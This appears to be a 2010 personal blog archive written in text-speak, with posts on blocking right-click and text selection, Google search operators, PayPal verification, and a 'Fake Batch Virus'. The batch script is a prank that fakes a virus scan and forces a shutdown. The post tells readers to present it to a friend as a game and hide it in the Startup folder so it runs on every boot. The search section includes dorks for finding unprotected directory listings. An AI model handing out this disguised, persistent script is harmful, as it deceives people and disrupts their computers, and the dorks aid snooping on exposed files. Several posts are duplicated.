Now I don't know if it is useful 4 U or not, but it'll B an eye catcher 4 sure. Many people R paranoid that what they put on their site will B copied by others. Now U can always add a script 2 block right-click like this one,
function disableRightClick(e){
var message = "Right click disabled";
if(!document.rightClickDisabled) // initialize
{if(document.layers){
document.captureEvents(Event.MOUSEDOWN);
document.onmousedown = disableRightClick;}
else document.oncontextmenu = disableRightClick;
return document.rightClickDisabled = true;}
if(document.layers || (document.getElementById && !document.all)){
if (e.which==2||e.which==3){
alert(message);
return false;}}
else
{alert(message);
return false;}}
disableRightClick();
Now, this takes care of right-clicks, but if U want 2 go ahead with this then try this. Copy & paste this code in a .js file, this will stop users from selecting any text or image from your web page.
Links will not B affected. Here is D code,
var Unselectable = {
enable : function(e) {
var e = e ? e : window.event;
if (e.button !=1) {
if (e.target) {
var targer = e.target;
} else if (e.srcElement) {
var targer = e.srcElement;
}
var targetTag = targer.tagName.toLowerCase();
if ((targetTag != "input") && (targetTag != "textarea")){
return false;
}
}
},
disable : function () {
return true;
}
}
if (typeof(document.onselectstart) != "undefined") {
document.onselectstart = Unselectable.enable;
} else {document.onmousedown = Unselectable.enable;
document.onmouseup = Unselectable.disable;}
Done now link it with any page & it'll B unselectable.
P.S.- Don't know Y but it doesn't works in Chrome. So I found a hack that works in Chrome.
Just add this code D body tag,
<body ondragstart="return false" onselectstart="return false">
Hope it helps U.
Monday, March 29, 2010
Sunday, March 28, 2010
Google Hacking Tricks Part-I
Google™ Hacking or whatever it is called is actually nothing but using some specific keywords 2 get a more desired results. There R lots of keywords & placing them here is not a small thing. So let's start with a few common words that might B helpful 2 U.
Type intext:your keyword. Google™ will search only text containing your keyword within D site ignoring D links, title & url.
Type intitle:my site. Google™ will search only 4 D sites containing D title my site.
U can also add variations 2 this search by typing, intitle:my intitle:site. This will search site whose title contain either my or site.
Also type allintitle:my site, this will force Google™ 2 search sites whose title contain both D words in D same order.
To find a specific file format e.g.- .doc or .pdf, type keyword filetype:doc. Google™ will find word documents with D name keyword.
If U want 2 search a single web page then type site:mysite.com my keyword.
U can also just search D domain name by typing
site:com keyword
site:org keyword
site:net keyword
site:tv keyword
Here R a few examples of using more than one hack
-inurl(html|htm|php) intitle:"index of" +"last modified" +"parent directory" +description +size
This will give U a list of unprotected directories
-inurl(html|htm|php) intitle:"index of" +"last modified" +"parent directory" +description +size +"Kareena Kapoor"
This will give U probably a list of Kareena Kapoor pics & stuff.
-inurl(html|htm|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(wmv|avi)
This will give U a list of wmv & avi files.
-inurl(html|htm|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(wma|mp3)
This will give a list of wma & mp3 audio files.
-inurl(html|htm|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(jpg|gif)
Jpeg & gif image file list.
Like type, -inurl(html|htm|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(wma|mp3) +"In the End", will give U a list of songs with title "In the End".
U can also do maths in Google™ (I wish I knew it when my exams were going). Just type D following in Google search & hit enter.
sine(30 degrees) - Finds D sin of 30 degrees.
2^20 - Finds 2 to D power of 20 (Don't know what that is)
sqrt(2870 - Finds D Square root of 287.
Here R D list of mathematical signs that Google™ recognizes & can B used.
+ For addition
- For subtraction
* For multiplication
/ For division
^ For exponential (x to the power of y)
% For modulo (finding the remainder after division)
U can convert one unit 2 other in Google™. Type,
5 oz in cup - Finds 5 ounces in 1 cup.
12 parsecs in feet - Finds 12 parsecs in 1 foot.
37 degrees in Fahrenheit - Converts 37 degrees to Fahrenheit.
Last but not least U can also use Google™ 2 find D meaning of a word by typing, define:word
There R more Google™ hacks but rest of them I'll post later.
Type intext:your keyword. Google™ will search only text containing your keyword within D site ignoring D links, title & url.
Type intitle:my site. Google™ will search only 4 D sites containing D title my site.
U can also add variations 2 this search by typing, intitle:my intitle:site. This will search site whose title contain either my or site.
Also type allintitle:my site, this will force Google™ 2 search sites whose title contain both D words in D same order.
To find a specific file format e.g.- .doc or .pdf, type keyword filetype:doc. Google™ will find word documents with D name keyword.
If U want 2 search a single web page then type site:mysite.com my keyword.
U can also just search D domain name by typing
site:com keyword
site:org keyword
site:net keyword
site:tv keyword
Here R a few examples of using more than one hack
-inurl(html|htm|php) intitle:"index of" +"last modified" +"parent directory" +description +size
This will give U a list of unprotected directories
-inurl(html|htm|php) intitle:"index of" +"last modified" +"parent directory" +description +size +"Kareena Kapoor"
This will give U probably a list of Kareena Kapoor pics & stuff.
-inurl(html|htm|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(wmv|avi)
This will give U a list of wmv & avi files.
-inurl(html|htm|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(wma|mp3)
This will give a list of wma & mp3 audio files.
-inurl(html|htm|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(jpg|gif)
Jpeg & gif image file list.
Like type, -inurl(html|htm|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(wma|mp3) +"In the End", will give U a list of songs with title "In the End".
U can also do maths in Google™ (I wish I knew it when my exams were going). Just type D following in Google search & hit enter.
sine(30 degrees) - Finds D sin of 30 degrees.
2^20 - Finds 2 to D power of 20 (Don't know what that is)
sqrt(2870 - Finds D Square root of 287.
Here R D list of mathematical signs that Google™ recognizes & can B used.
+ For addition
- For subtraction
* For multiplication
/ For division
^ For exponential (x to the power of y)
% For modulo (finding the remainder after division)
U can convert one unit 2 other in Google™. Type,
5 oz in cup - Finds 5 ounces in 1 cup.
12 parsecs in feet - Finds 12 parsecs in 1 foot.
37 degrees in Fahrenheit - Converts 37 degrees to Fahrenheit.
Last but not least U can also use Google™ 2 find D meaning of a word by typing, define:word
There R more Google™ hacks but rest of them I'll post later.
Friday, March 26, 2010
Verify your Paypal account by a Paypal Plus Credit card
In this post I'll tell U how 2 verify your Paypal account by applying 4 a Paypal Plus Credit card.
U might also want 2 read my previous post on how 2 verify your Paypal™ account by Bank account.
U might also want 2 read my previous post on how 2 verify your Paypal™ account by Bank account.
- Scroll down on your Paypal™ Account page
- Click on "Plus Card" link. U'll B take 2 D "Paypal™ Plus Credit Card" page
- Click on D "Apply Now" button.
- Fill in D application form. Most of D information R those that Paypal™ already has
- If U want 2 enter D Account Security Program then check D box by it side. Then read D "Terms & Conditions".
- Hit D "Accept and Submit" button. In 1 minute paypal™ will inform U if U R approved or not. If U R approved then your account will automatically B verified.
Verify your Paypal account by Bank account.
Today a friend of mine asked me about verifying Paypal™ account. Now if your account is verified then U have no limit on how much U transfer & U can assure your users that all transactions that they made R valid & safe.
U can verify your Paypal™ account by your Bank account.
U can also verify your Paypal™ account using Paypal™ Plus Credit card.
U can verify your Paypal™ account by your Bank account.
- Login In your PayPal™ account. U'll B at "My Account Overview" page.
- Find "Activate Account" heading & click on "Add Bank Account". U can also add a Bank account on "Profile Summary" page by clicking on "Bank Accounts" in the "Financial Information" column
- Enter your bank account details e.g.- bank name, branch code, your account number, etc, hit continue.
- Paypal™ offers 2 methods to verify your account.
- If your bank offers online banking then enter your online banking information. Paypal™ will check with D bank to verify your account instantly.
- Second method is Paypal™ will deposit 2 small deposits in your bank account. Check your bank statements for those Paypal™ deposits. Click on "Confirm Bank Account" link on your "Account Summary" page, then enter the amounts of D deposits.
U can also verify your Paypal™ account using Paypal™ Plus Credit card.
Tuesday, March 23, 2010
Fake Batch Virus
I've seen lots of fake viruses, some R nice some are good, but this one that I made is better than others.
Now it does nothing much it only opens command prompt and asks U 2 hit a key when U hit a key it starts showing a message that it is a virus and it'll delete all your files, D usual stuff.
Then it appears that D computer is scanning 4 D virus and it deletes D system32 folder and then your computer can't reboot and it shuts down. There is a code that creates a shutdown countdown at D end.
So Here's D code
@echo off
rem Batch Attack v1.0
rem Created By Tanmay Das
title Command Prompt
echo.
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
pause
cls
color 04
title Mad Hatter v0.1
echo.
echo I have something to tell you.
@ping 127.0.0.1 -n 3 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
:rest
echo Actually I'm a virus.....
@ping 127.0.0.1 -n 3 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo I will delete your files.....
@ping 127.0.0.1 -n 3 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo COOL RIGHT!!!!
@ping 127.0.0.1 -n 3 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo So you better say goodbye to all your files!!
@ping 127.0.0.1 -n 3 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo Nothing Personal it's just the way I was made :)
@ping 127.0.0.1 -n 4 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
cls
title Microsoft Windows [Version 5.1.2600]
echo.
echo WARNING!!!!!!!!!
echo.
@ping 127.0.0.1 -n 1 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo Virus Infection found in the system
echo.
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo Scanning System for Infected Files
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
dir/s
@ping 127.0.0.1 -n 1 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
dir/d
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo System Scan Completed!!!!!!!!
echo.
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo Infected Files Found
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo C:\WINDOWS\system32
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo Deleting Infected Files!!!!!
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo ACCESS DENIED !!!!!!!!
@ping 127.0.0.1 -n 1 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo ACCESS DENIED !!!!!!!!
@ping 127.0.0.1 -n 1 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo ACCESS DENIED !!!!!!!!
@ping 127.0.0.1 -n 1 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo ACCESS DENIED !!!!!!!!
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo Cannot Delete Infected Files!!!!!
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo System Files Corrupted
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo Windows Has Found Fatal Runtime Error
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo Windows Can Not Reboot Itself
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo Windows Is Shutting Down
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
msg * Windows is Shutting Down
shutdown -s -t 30 "Windows file write delayed. Unable to locate system.exe"
EXIT
Copy Paste it in Notepad and save it as install.bat
Tell your friend it's a new game or something. It'll B fun.
Hide this file in the Startup folder in C:\Documents and Settings\Username\Start Menu\Programs\Startup
Then It'll automatically start on every boot up.
Next I'll post a code 2 copy this file 2 Startup folder so U don't have 2.
Now it does nothing much it only opens command prompt and asks U 2 hit a key when U hit a key it starts showing a message that it is a virus and it'll delete all your files, D usual stuff.
Then it appears that D computer is scanning 4 D virus and it deletes D system32 folder and then your computer can't reboot and it shuts down. There is a code that creates a shutdown countdown at D end.
So Here's D code
@echo off
rem Batch Attack v1.0
rem Created By Tanmay Das
title Command Prompt
echo.
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
pause
cls
color 04
title Mad Hatter v0.1
echo.
echo I have something to tell you.
@ping 127.0.0.1 -n 3 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
:rest
echo Actually I'm a virus.....
@ping 127.0.0.1 -n 3 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo I will delete your files.....
@ping 127.0.0.1 -n 3 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo COOL RIGHT!!!!
@ping 127.0.0.1 -n 3 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo So you better say goodbye to all your files!!
@ping 127.0.0.1 -n 3 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo Nothing Personal it's just the way I was made :)
@ping 127.0.0.1 -n 4 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
cls
title Microsoft Windows [Version 5.1.2600]
echo.
echo WARNING!!!!!!!!!
echo.
@ping 127.0.0.1 -n 1 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo Virus Infection found in the system
echo.
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo Scanning System for Infected Files
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
dir/s
@ping 127.0.0.1 -n 1 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
dir/d
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo System Scan Completed!!!!!!!!
echo.
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo Infected Files Found
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo C:\WINDOWS\system32
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo Deleting Infected Files!!!!!
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo ACCESS DENIED !!!!!!!!
@ping 127.0.0.1 -n 1 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo ACCESS DENIED !!!!!!!!
@ping 127.0.0.1 -n 1 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo ACCESS DENIED !!!!!!!!
@ping 127.0.0.1 -n 1 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo ACCESS DENIED !!!!!!!!
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo Cannot Delete Infected Files!!!!!
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo System Files Corrupted
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo Windows Has Found Fatal Runtime Error
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo Windows Can Not Reboot Itself
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo Windows Is Shutting Down
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
msg * Windows is Shutting Down
shutdown -s -t 30 "Windows file write delayed. Unable to locate system.exe"
EXIT
Copy Paste it in Notepad and save it as install.bat
Tell your friend it's a new game or something. It'll B fun.
Hide this file in the Startup folder in C:\Documents and Settings\Username\Start Menu\Programs\Startup
Then It'll automatically start on every boot up.
Next I'll post a code 2 copy this file 2 Startup folder so U don't have 2.
Subscribe to:
Posts (Atom)